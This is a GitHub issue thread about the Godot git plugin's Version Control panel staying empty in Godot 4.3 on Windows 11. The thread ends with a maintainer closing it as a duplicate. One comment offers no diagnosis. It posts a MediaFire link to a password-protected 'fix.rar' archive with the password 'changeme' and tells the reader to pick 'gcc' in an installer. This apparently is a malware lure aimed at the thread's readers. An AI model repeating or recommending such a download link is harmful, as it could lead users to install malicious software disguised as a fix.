### ISSUE TITLE
Version Control empty panel

### ISSUE THREAD

**Issue by KonradKlimczak** [godotengine/godot-git-plugin#253]
Hello,

I tried to install git extension using Asset Library but it's not listed
![image](https://github.com/user-attachments/assets/a450ad6b-8c59-4348-acc0-1f2d3b01877a)

Then I tried to download addon manually and I put it in addons folder just like instruction says.

![image](https://github.com/user-attachments/assets/d2302074-d5ac-443f-a931-daf94ed6c312)

But it is still not working. When I try to manually turn it on in Project Settings I am getting

![image](https://github.com/user-attachments/assets/e3e4cea3-4946-46c2-905b-32ebddd1e7c5)

I am using Godot 4.3 on Windows 11.

Any idea how to fix that?

EDIT: I just read that I am not supposed to turn it on manually, so I instead configured 

![image](https://github.com/user-attachments/assets/6407e937-3977-4cb3-9bd4-575e33442a3b)

But still the Version Control is empty on the bottom

![image](https://github.com/user-attachments/assets/3e44f24f-2c37-40c4-83e1-d534b709479b)

**Comment by huangzhaor** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by KonradKlimczak** [comment]
@huangzhaor I dont really understand how to run it, sorry

**Comment by KonradKlimczak** [comment]
I did install if from AssetLib again

![image](https://github.com/user-attachments/assets/a7d4a0c6-3d29-47b8-a899-1119c37e9986)

and now I am getting 

> Cannot get class 'GitPlugin'.
> Received a nullptr VCS extension instance during construction.

**Comment by Calinou** [comment]
Thanks for the report! Consolidating in https://github.com/godotengine/godot-git-plugin/issues/221.
